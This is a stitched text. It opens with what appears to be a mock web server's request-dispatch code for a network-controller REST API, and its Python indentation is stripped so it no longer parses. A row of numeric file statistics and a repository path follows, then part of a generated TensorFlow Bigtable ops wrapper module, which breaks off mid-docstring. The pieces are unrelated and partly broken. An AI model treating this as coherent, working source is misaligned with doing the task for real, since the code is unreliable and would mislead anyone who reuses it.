if self.matches_FILE_9698c8ec4a0b8c1a():
self.file_downloadafilebyfile_id_response()
return
if self.matches_PATH_TRACE_55bc3bf94e38b6ff():
self.path_trace_retrivesallprevious_pathtracessummary_response()
return
if self.matches_PATH_TRACE_7ab9a8bd4f3b86a4():
self.path_trace_retrievesprevious_pathtrace_response()
return
if self.matches_NON_FABRIC_WIRELESS_6896993e41b8bd7a():
self.non_fabric_wireless_get_wireless_profile_response()
return
if self.matches_NON_FABRIC_WIRELESS_cca519ba45ebb423():
self.non_fabric_wireless_get_enterprise_ssid_response()
return
if self.matches_FABRIC_WIRED_d0b3593c4a7aaf22():
self.fabric_wired_getsborderdevicedetailsfrom_sda_fabric_response()
return
if self.matches_DEVICES_0db7da744c0b83d8():
self.devices_get_module_infoby_id_response()
return
if self.matches_DEVICES_20b19b52464b8972():
self.devices_get_devicelist_response()
return
if self.matches_DEVICES_288df9494f2a9746():
self.devices_get_device_interface_vlans_response()
return
if self.matches_DEVICES_38bd0b884b89a785():
self.devices_get_polling_intervalforalldevices_response()
return
if self.matches_DEVICES_349c888443b89a58():
self.devices_get_device_interfacesbyspecifiedrange_response()
return
if self.matches_DEVICES_3d923b184dc9a4ca():
self.devices_get_device_interface_count_response()
return
if self.matches_DEVICES_4eb56a614cc9a2d2():
self.devices_get_interfacedetails_response()
return
if self.matches_DEVICES_5b8639224cd88ea7():
self.devices_get_device_interfacecountbyid_response()
return
if self.matches_DEVICES_5db21b8e43fab7d8():
self.devices_get_device_count_response()
return
if self.matches_DEVICES_70ad397649e9b4d3():
self.devices_get_ospfinterfaces_response()
return
if self.matches_DEVICES_82918a1b4d289c5c():
self.devices_get_polling_intervalby_id_response()
return
if self.matches_DEVICES_84b37ae54c59ab28():
self.devices_get_organizationlistfor_meraki_response()
return
if self.matches_DEVICES_81bb4804405a8d2f():
self.devices_get_functional_capabilityby_id_response()
return
if self.matches_DEVICES_84ad8b0e42cab48a():
self.devices_get_isisinterfaces_response()
return
if self.matches_DEVICES_84b33a9e480abcaf():
self.devices_get_device_configby_id_response()
return
if self.matches_DEVICES_819f9aa54feab7bf():
self.devices_get_device_summary_response()
return
if self.matches_DEVICES_8fa8eb404a4a8d96():
self.devices_get_deviceby_id_response()
return
if self.matches_DEVICES_ba9dc85b4b8a9a17():
self.devices_get_interfaceinfoby_id_response()
return
if self.matches_DEVICES_c9809b6744f8a502():
self.devices_registerdevicefor_wsa_response()
return
if self.matches_DEVICES_b7bcaa084e2b90d0():
self.devices_get_device_configforalldevices_response()
return
if self.matches_DEVICES_cd8469e647caab0e():
self.devices_get_interfaceby_ip_response()
return
if self.matches_DEVICES_d0a4b88145aabb51():
self.devices_get_network_deviceby_ip_response()
return
if self.matches_DEVICES_888f585c49b88441():
self.devices_get_device_config_count_response()
return
if self.matches_DEVICES_d888ab6d4d59a8c1():
self.devices_get_deviceby_serialnumber_response()
return
if self.matches_DEVICES_f5947a4c439a8bf0():
self.devices_getallinterfaces_response()
return
if self.matches_DEVICES_8db939744649a782():
self.devices_get_modulecount_response()
return
if self.matches_DEVICES_eb8249e34f69b0f1():
self.devices_get_modules_response()
return
if self.matches_DEVICES_f6826a8e41bba242():
self.devices_getwirelesslancontrollerdetailsby_id_response()
return
if self.matches_DEVICES_b888792d43baba46():
self.devices_get_interfaceby_id_response()
return
if self.matches_DEVICES_c3b3c9ef4e6b8a09():
self.devices_get_functional_capabilityfordevices_response()
return
if self.matches_DEVICES_89b2fb144f5bb09b():
self.devices_get_device_detail_response()
return
if self.matches_DEVICES_f49548c54be8a3e2():
self.devices_get_network_devicebypaginationrange_response()
return
if self.matches_DEVICES_ffa748cc44e9a437():
self.devices_retrievesallnetworkdevices_response()
return
if self.matches_SITES_17a82ac94cf99ab0():
self.sites_get_site_health_response()
return
if self.matches_SITES_209509d247599e19():
self.sites_get_site_response()
return
if self.matches_SITES_d9bdb9034df99dba():
self.sites_get_site_count_response()
return
if self.matches_SITES_eba669054e08a60e():
self.sites_get_membership_response()
return
if self.matches_NETWORKS_6284db4649aa8d31():
self.networks_get_vlandetails_response()
return
if self.matches_NETWORKS_9ba14a9e441b8a60():
self.networks_get_site_topology_response()
return
if self.matches_NETWORKS_b2b8cb91459aa58f():
self.networks_get_physical_topology_response()
return
if self.matches_NETWORKS_b9b48ac8463a8aba():
self.networks_gettopologydetails_response()
return
if self.matches_NETWORKS_c2b5fb764d888375():
self.networks_get_l3_topology_details_response()
return
if self.matches_NETWORKS_ca91da84401abba1():
self.networks_get_overall_network_health_response()
return
if self.matches_CLIENTS_149aa93b4ddb80dd():
self.clients_get_overall_client_health_response()
return
if self.matches_CLIENTS_e2adba7943bab3e9():
self.clients_get_client_detail_response()
return
if self.matches_PNP_0a9c988445cb91c8():
self.pnp_get_sync_resultfor_virtual_account_response()
return
if self.matches_PNP_3cb24acb486b89d2():
self.pnp_get_smart_account_list_response()
return
if self.matches_PNP_7989f86846faaf99():
self.pnp_get_workflow_count_response()
return
if self.matches_PNP_70a479a6462a9496():
self.pnp_get_virtual_account_list_response()
return
if self.matches_PNP_7e92f9eb46db8320():
self.pnp_get_pnpglobalsettings_response()
return
if self.matches_PNP_aeb4dad04a99bbe3():
self.pnp_get_workflows_response()
return
if self.matches_PNP_bab6c9e5440885cc():
self.pnp_get_deviceby_id_response()
return
if self.matches_PNP_d9a1fa9c4068b23c():
self.pnp_get_device_count_response()
return
if self.matches_PNP_80acb88e4ac9ac6d():
self.pnp_get_workflowby_id_response()
return
if self.matches_PNP_f09319674049a7d4():
self.pnp_get_device_history_response()
return
if self.matches_PNP_e6b3db8046c99654():
self.pnp_get_devicelist_response()
return
if self.matches_SWIM_0c8f7a0b49b9aedd():
self.swim_getsoftwareimagedetails_response()
return
if self.matches_SITE_PROFILE_7fbe4b804879baa4():
self.site_profile_get_devicedetailsby_ip_response()
return
def do_POST(self):
if self.matches_AUTHENTICATION_ac8ae94c4e69a09d():
self.authentication_authentication_response()
return
if self.matches_TEMPLATE_PROGRAMMER_00aec9b1422ab27e():
self.template_programmer_create_project_response()
return
if self.matches_TEMPLATE_PROGRAMMER_6099da82477b858a():
self.template_programmer_deploy_template_response()
return
if self.matches_TEMPLATE_PROGRAMMER_62b05b2c40a9b216():
self.template_programmer_version_template_response()
return
if self.matches_TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16():
self.template_programmer_create_template_response()
return
if self.matches_TAG_00a2fa6146089317():
self.tag_addmemberstothetag_response()
return
if self.matches_TAG_1399891c42a8be64():
self.tag_create_tag_response()
return
if self.matches_NETWORK_DISCOVERY_17929bc7465bb564():
self.network_discovery_create_netconfcredentials_response()
return
if self.matches_NETWORK_DISCOVERY_4d9ca8e2431a8a24():
self.network_discovery_create_httpwritecredentials_response()
return
if self.matches_NETWORK_DISCOVERY_55b439dc4239b140():
self.network_discovery_startdiscovery_response()
return
if self.matches_NETWORK_DISCOVERY_6bacb8d14639bdc7():
self.network_discovery_create_snmpwritecommunity_response()
return
if self.matches_NETWORK_DISCOVERY_948ea8194348bc0b():
self.network_discovery_create_cli_credentials_response()
return
if self.matches_NETWORK_DISCOVERY_979688084b7ba60d():
self.network_discovery_create_snmpv3credentials_response()
return
if self.matches_NETWORK_DISCOVERY_a5ac99774c6bb541():
self.network_discovery_create_update_snmpproperties_response()
return
if self.matches_NETWORK_DISCOVERY_bf859ac64a0ba19c():
self.network_discovery_create_httpreadcredentials_response()
return
if self.matches_NETWORK_DISCOVERY_7aa3da9d4e098ef2():
self.network_discovery_create_snmpreadcommunity_response()
return
if self.matches_COMMAND_RUNNER_d6b8ca774739adf4():
self.command_runner_runread_onlycommandsondevices_response()
return
if self.matches_PATH_TRACE_a395fae644ca899c():
self.path_trace_initiateanew_pathtrace_response()
return
if self.matches_NON_FABRIC_WIRELESS_07913b7f4e1880de():
self.non_fabric_wireless_provision_response()
return
if self.matches_NON_FABRIC_WIRELESS_47ba59204e0ab742():
self.non_fabric_wireless_create_wireless_profile_response()
return
if self.matches_NON_FABRIC_WIRELESS_db9f997f4e59aec1():
self.non_fabric_wireless_createand_provision_ssid_response()
return
if self.matches_NON_FABRIC_WIRELESS_8a96fb954d09a349():
self.non_fabric_wireless_create_enterprise_ssid_response()
return
if self.matches_FABRIC_WIRED_a4b56a5f478a97dd():
self.fabric_wired_addsborderdevicein_sda_fabric_response()
return
if self.matches_DEVICES_4bb22af046fa8f08():
self.devices_add_device_response()
return
if self.matches_DEVICES_cd98780f4888a66d():
self.devices_export_devicelist_response()
return
if self.matches_SITES_23896b124bd8b9bf():
self.sites_create_site_response()
return
if self.matches_SITES_eeb168eb41988e07():
self.sites_assign_device_to_site_response()
return
if self.matches_PNP_0b836b7b4b6a9fd5():
self.pnp_un_claim_device_response()
return
if self.matches_PNP_1e962af345b8b59f():
self.pnp_add_virtual_account_response()
return
if self.matches_PNP_21a6db2540298f55():
self.pnp_import_devicesinbulk_response()
return
if self.matches_PNP_5889fb844939a13b():
self.pnp_claima_devicetoa_site_response()
return
if self.matches_PNP_848b5a7b4f9b8c12():
self.pnp_adda_workflow_response()
return
if self.matches_PNP_a4b6c87a4ffb9efa():
self.pnp_sync_virtual_account_devices_response()
return
if self.matches_PNP_9e857b5a4a0bbcdb():
self.pnp_reset_device_response()
return
if self.matches_PNP_cf9418234d9ab37e():
self.pnp_preview_config_response()
return
if self.matches_PNP_f3b26b5544cabab9():
self.pnp_add_device_response()
return
if self.matches_PNP_d8a619974a8a8c48():
self.pnp_claim_device_response()
return
if self.matches_SWIM_8cb6783b4faba1f4():
self.swim_triggersoftwareimagedistribution_response()
return
if self.matches_SWIM_4dbe3bc743a891bc():
self.swim_importlocalsoftwareimage_response()
return
if self.matches_SWIM_fb9beb664f2aba4c():
self.swim_triggersoftwareimageactivation_response()
return
if self.matches_SWIM_bc8aab4746ca883d():
self.swim_importsoftwareimagevia_url_response()
return
if self.matches_SITE_PROFILE_828828f44f28bd0d():
self.site_profile_provision_nfv_response()
return
if self.matches_SITE_PROFILE_2f97e8fa45f8b2a3():
self.site_profile_nfv_provisioning_detail_response()
return
def do_PUT(self):
if self.matches_TEMPLATE_PROGRAMMER_7781fa0548a98342():
self.template_programmer_update_template_response()
return
if self.matches_TEMPLATE_PROGRAMMER_9480fa1f47ca9254():
self.template_programmer_update_project_response()
return
if self.matches_TEMPLATE_PROGRAMMER_f393abe84989bb48():
self.template_programmer_preview_template_response()
return
if self.matches_TAG_45bc7a8344a8bc1e():
self.tag_updatestagmembership_response()
return
if self.matches_TAG_4d86a993469a9da9():
self.tag_update_tag_response()
return
if self.matches_NETWORK_DISCOVERY_10b06a6a4f7bb3cb():
self.network_discovery_update_snmpwritecommunity_response()
return
if self.matches_NETWORK_DISCOVERY_1da5ebdd434aacfe():
self.network_discovery_update_snmpv3credentials_response()
return
if self.matches_NETWORK_DISCOVERY_47a1b84b4e1b8044():
self.network_discovery_update_snmpreadcommunity_response()
return
if self.matches_NETWORK_DISCOVERY_89b36b4649999d81():
self.network_discovery_update_httpreadcredential_response()
return
if self.matches_NETWORK_DISCOVERY_9788b8fc4418831d():
self.network_discovery_updatesdiscoveryby_id_response()
return
if self.matches_NETWORK_DISCOVERY_b68a6bd8473a9a25():
self.network_discovery_update_httpwritecredentials_response()
return
if self.matches_NETWORK_DISCOVERY_fba0d80747eb82e8():
self.network_discovery_update_cli_credentials_response()
return
if self.matches_NETWORK_DISCOVERY_c5acd9fa4c1a8abc():
self.network_discovery_update_netconfcredentials_response()
return
if self.matches_NETWORK_DISCOVERY_709fda3c42b8877a():
self.network_discovery_updateglobalcredentials_response()
return
if self.matches_NON_FABRIC_WIRELESS_20872aec43b9bf50():
self.non_fabric_wireless_update_wireless_profile_response()
return
if self.matches_NON_FABRIC_WIRELESS_a0be3a2f47ab9f3c():
self.non_fabric_wireless_update_provision_response()
return
if self.matches_DEVICES_3b9ef9674429be4c():
self.devices_sync_devicesusingforce_sync_response()
return
if self.matches_DEVICES_b9855ad54ae98156():
self.devices_update_devicerole_response()
return
if self.matches_DEVICES_aeb9eb67460b92df():
self.devices_sync_devices_response()
return
if self.matches_SITES_33aab9b842388023():
self.sites_update_site_response()
return
if self.matches_PNP_09b0f9ce4239ae10():
self.pnp_update_device_response()
return
if self.matches_PNP_3086c9624f498b85():
self.pnp_update_workflow_response()
return
if self.matches_PNP_6f9819e84178870c():
self.pnp_update_pnp_server_profile_response()
return
if self.matches_PNP_8da0391947088a5a():
self.pnp_update_pnpglobalsettings_response()
return
def do_DELETE(self):
if self.matches_TEMPLATE_PROGRAMMER_a7b42836408a8e74():
self.template_programmer_delete_template_response()
return
if self.matches_TEMPLATE_PROGRAMMER_d0a1abfa435b841d():
self.template_programmer_delete_project_response()
return
if self.matches_TAG_429c28154bdaa13d():
self.tag_delete_tag_response()
return
if self.matches_TAG_caa3ea704d78b37e():
self.tag_remove_tagmember_response()
return
if self.matches_NETWORK_DISCOVERY_4c8cab5f435a80f4():
self.network_discovery_deletediscoveryby_id_response()
return
if self.matches_NETWORK_DISCOVERY_c1ba9a424c08a01b():
self.network_discovery_deletediscoverybyspecifiedrange_response()
return
if self.matches_NETWORK_DISCOVERY_db8e09234a988bab():
self.network_discovery_deletealldiscovery_response()
return
if self.matches_NETWORK_DISCOVERY_f5ac590c4ca9975a():
self.network_discovery_deleteglobalcredentialsby_id_response()
return
if self.matches_PATH_TRACE_8a9d2b76443b914e():
self.path_trace_deletes_pathtraceby_id_response()
return
if self.matches_NON_FABRIC_WIRELESS_ae86a8c14b5980b7():
self.non_fabric_wireless_delete_wireless_profile_response()
return
if self.matches_NON_FABRIC_WIRELESS_c7a6592b4b98a369():
self.non_fabric_wireless_delete_enterprise_ssid_response()
return
if self.matches_NON_FABRIC_WIRELESS_cca098344a489dfa():
self.non_fabric_wireless_deleteandprovision_ssid_response()
return
if self.matches_FABRIC_WIRED_1e80bb50430b8634():
self.fabric_wired_deletesborderdevicefrom_sda_fabric_response()
return
if self.matches_DEVICES_1c894b5848eab214():
self.devices_delete_deviceby_id_response()
return
if self.matches_SITES_92acda91406aa050():
self.sites_delete_site_response()
return
if self.matches_PNP_2499e9ad42e8ae5b():
self.pnp_deregister_virtual_account_response()
return
if self.matches_PNP_af8d7b0e470b8ae2():
self.pnp_delete_workflow_by_id_response()
return
if self.matches_PNP_cdab9b474899ae06():
self.pnp_delete_deviceby_idfrom_pnp_response()
return
| 62.547421 | 14,472 | 0.663137 | 24,773 | 248,626 | 6.489323 | 0.051831 | 0.036949 | 0.017915 | 0.019035 | 0.866341 | 0.827103 | 0.770975 | 0.725411 | 0.704989 | 0.696299 | 0 | 0.042367 | 0.178055 | 248,626 | 3,974 | 14,473 | 62.563161 | 0.744296 | 0.050675 | 0 | 0.544479 | 0 | 0.000346 | 0.342929 | 0.053608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125995 | false | 0.003808 | 0.005192 | 0.062305 | 0.380755 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4811b614e5347bd18028d7b895042571a5ab0475 | 31,706 | py | Python | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | 1 | 2019-01-12T13:17:32.000Z | 2019-01-12T13:17:32.000Z | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | null | null | null | rcnn/lib/python3.6/site-packages/tensorflow/contrib/bigtable/ops/gen_bigtable_ops.py | dreamingweaver/making_passportImage | 68f23411780ff82abe934dfae5fc04acb80f2c49 | [
"MIT"
] | null | null | null | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: bigtable_ops.cc
"""
import collections as _collections
import six as _six
from tensorflow.python import pywrap_tensorflow as _pywrap_tensorflow
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import errors as _errors
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.tf_export import tf_export
@tf_export('bigtable_client')
def bigtable_client(project_id, instance_id, connection_pool_size, max_receive_message_size=-1, container="", shared_name="", name=None):
r"""TODO: add doc.
Args:
project_id: A `string`.
instance_id: A `string`.
connection_pool_size: An `int`.
max_receive_message_size: An optional `int`. Defaults to `-1`.
container: An optional `string`. Defaults to `""`.
shared_name: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
project_id = _execute.make_str(project_id, "project_id")
instance_id = _execute.make_str(instance_id, "instance_id")
connection_pool_size = _execute.make_int(connection_pool_size, "connection_pool_size")
if max_receive_message_size is None:
max_receive_message_size = -1
max_receive_message_size = _execute.make_int(max_receive_message_size, "max_receive_message_size")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableClient", project_id=project_id, instance_id=instance_id,
connection_pool_size=connection_pool_size,
max_receive_message_size=max_receive_message_size,
container=container, shared_name=shared_name, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("project_id", _op.get_attr("project_id"), "instance_id",
_op.get_attr("instance_id"), "connection_pool_size",
_op.get_attr("connection_pool_size"),
"max_receive_message_size",
_op.get_attr("max_receive_message_size"), "container",
_op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"))
_execute.record_gradient(
"BigtableClient", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableClient", name, _ctx._post_execution_callbacks, "project_id",
project_id, "instance_id", instance_id, "connection_pool_size",
connection_pool_size, "max_receive_message_size",
max_receive_message_size, "container", container, "shared_name",
shared_name)
return _result
except _core._FallbackException:
return bigtable_client_eager_fallback(
project_id=project_id, instance_id=instance_id,
connection_pool_size=connection_pool_size,
max_receive_message_size=max_receive_message_size,
container=container, shared_name=shared_name, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_client_eager_fallback(project_id, instance_id, connection_pool_size, max_receive_message_size=-1, container="", shared_name="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_client
"""
_ctx = ctx if ctx else _context.context()
project_id = _execute.make_str(project_id, "project_id")
instance_id = _execute.make_str(instance_id, "instance_id")
connection_pool_size = _execute.make_int(connection_pool_size, "connection_pool_size")
if max_receive_message_size is None:
max_receive_message_size = -1
max_receive_message_size = _execute.make_int(max_receive_message_size, "max_receive_message_size")
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_inputs_flat = []
_attrs = ("project_id", project_id, "instance_id", instance_id,
"connection_pool_size", connection_pool_size, "max_receive_message_size",
max_receive_message_size, "container", container, "shared_name",
shared_name)
_result = _execute.execute(b"BigtableClient", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BigtableClient", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableClient")(None)
@tf_export('bigtable_lookup_dataset')
def bigtable_lookup_dataset(keys_dataset, table, column_families, columns, name=None):
r"""TODO: add doc.
Args:
keys_dataset: A `Tensor` of type `variant`.
table: A `Tensor` of type `resource`.
column_families: A `Tensor` of type `string`.
columns: A `Tensor` of type `string`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableLookupDataset", keys_dataset=keys_dataset, table=table,
column_families=column_families, columns=columns, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtableLookupDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableLookupDataset", name, _ctx._post_execution_callbacks,
keys_dataset, table, column_families, columns)
return _result
except _core._FallbackException:
return bigtable_lookup_dataset_eager_fallback(
keys_dataset, table, column_families, columns, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_lookup_dataset_eager_fallback(keys_dataset, table, column_families, columns, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_lookup_dataset
"""
_ctx = ctx if ctx else _context.context()
keys_dataset = _ops.convert_to_tensor(keys_dataset, _dtypes.variant)
table = _ops.convert_to_tensor(table, _dtypes.resource)
column_families = _ops.convert_to_tensor(column_families, _dtypes.string)
columns = _ops.convert_to_tensor(columns, _dtypes.string)
_inputs_flat = [keys_dataset, table, column_families, columns]
_attrs = None
_result = _execute.execute(b"BigtableLookupDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BigtableLookupDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableLookupDataset")(None)
@tf_export('bigtable_prefix_key_dataset')
def bigtable_prefix_key_dataset(table, prefix, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
prefix: A `Tensor` of type `string`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtablePrefixKeyDataset", table=table, prefix=prefix, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtablePrefixKeyDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtablePrefixKeyDataset", name, _ctx._post_execution_callbacks,
table, prefix)
return _result
except _core._FallbackException:
return bigtable_prefix_key_dataset_eager_fallback(
table, prefix, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_prefix_key_dataset_eager_fallback(table, prefix, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_prefix_key_dataset
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
_inputs_flat = [table, prefix]
_attrs = None
_result = _execute.execute(b"BigtablePrefixKeyDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BigtablePrefixKeyDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtablePrefixKeyDataset")(None)
@tf_export('bigtable_range_key_dataset')
def bigtable_range_key_dataset(table, start_key, end_key, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
start_key: A `Tensor` of type `string`.
end_key: A `Tensor` of type `string`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableRangeKeyDataset", table=table, start_key=start_key,
end_key=end_key, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtableRangeKeyDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableRangeKeyDataset", name, _ctx._post_execution_callbacks,
table, start_key, end_key)
return _result
except _core._FallbackException:
return bigtable_range_key_dataset_eager_fallback(
table, start_key, end_key, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_range_key_dataset_eager_fallback(table, start_key, end_key, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_range_key_dataset
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
_inputs_flat = [table, start_key, end_key]
_attrs = None
_result = _execute.execute(b"BigtableRangeKeyDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BigtableRangeKeyDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableRangeKeyDataset")(None)
@tf_export('bigtable_sample_key_pairs_dataset')
def bigtable_sample_key_pairs_dataset(table, prefix, start_key, end_key, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
prefix: A `Tensor` of type `string`.
start_key: A `Tensor` of type `string`.
end_key: A `Tensor` of type `string`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableSampleKeyPairsDataset", table=table, prefix=prefix,
start_key=start_key, end_key=end_key, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtableSampleKeyPairsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableSampleKeyPairsDataset", name, _ctx._post_execution_callbacks,
table, prefix, start_key, end_key)
return _result
except _core._FallbackException:
return bigtable_sample_key_pairs_dataset_eager_fallback(
table, prefix, start_key, end_key, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_sample_key_pairs_dataset_eager_fallback(table, prefix, start_key, end_key, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_sample_key_pairs_dataset
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
prefix = _ops.convert_to_tensor(prefix, _dtypes.string)
start_key = _ops.convert_to_tensor(start_key, _dtypes.string)
end_key = _ops.convert_to_tensor(end_key, _dtypes.string)
_inputs_flat = [table, prefix, start_key, end_key]
_attrs = None
_result = _execute.execute(b"BigtableSampleKeyPairsDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BigtableSampleKeyPairsDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableSampleKeyPairsDataset")(None)
@tf_export('bigtable_sample_keys_dataset')
def bigtable_sample_keys_dataset(table, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
_, _, _op = _op_def_lib._apply_op_helper(
"BigtableSampleKeysDataset", table=table, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
_execute.record_gradient(
"BigtableSampleKeysDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BigtableSampleKeysDataset", name, _ctx._post_execution_callbacks,
table)
return _result
except _core._FallbackException:
return bigtable_sample_keys_dataset_eager_fallback(
table, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def bigtable_sample_keys_dataset_eager_fallback(table, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function bigtable_sample_keys_dataset
"""
_ctx = ctx if ctx else _context.context()
table = _ops.convert_to_tensor(table, _dtypes.resource)
_inputs_flat = [table]
_attrs = None
_result = _execute.execute(b"BigtableSampleKeysDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"BigtableSampleKeysDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_ops.RegisterShape("BigtableSampleKeysDataset")(None)
@tf_export('bigtable_scan_dataset')
def bigtable_scan_dataset(table, prefix, start_key, end_key, column_families, columns, probability, name=None):
r"""TODO: add doc.
Args:
table: A `Tensor` of type `resource`.
